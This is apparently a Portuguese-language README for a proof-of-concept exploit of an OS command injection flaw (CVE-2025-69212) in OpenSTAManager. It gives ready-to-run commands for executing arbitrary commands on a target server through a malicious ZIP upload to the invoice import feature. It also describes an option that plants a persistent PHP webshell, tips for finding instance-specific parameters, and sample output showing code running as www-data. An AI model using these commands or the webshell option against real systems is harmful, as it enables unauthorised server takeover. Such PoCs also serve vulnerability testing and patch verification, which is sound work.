
CVE-2025-69212 - PoC de Injeção de Comandos do SO no OpenSTAManager
Instalar dependências:
pip install -r requirements.txt
Executar um único comando e mostrar sua saída:
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
Inserir um webshell PHP persistente:
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell
| Flag | Descrição |
|---|
-u, --url | URL base da instância alvo |
-U, --username | Nome de usuário para autenticação |
-P, --password | Senha para autenticação |
-c, --command | Comando a executar, saída salva em pwn_out.txt |
--shell | Inserir um webshell PHP em files/shell.php em vez de executar um único comando |
--id-module | ID do módulo para o recurso de importação de faturas (padrão: 14) |
--id-plugin | ID do plugin para o recurso de importação de faturas (padrão: 48) |
id_module e id_plugin são específicos da instância. Se os padrões não funcionarem, faça login na interface web do alvo, navegue até o recurso de importação de faturas eletrônicas e verifique os parâmetros da requisição na aba de rede do seu navegador.
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------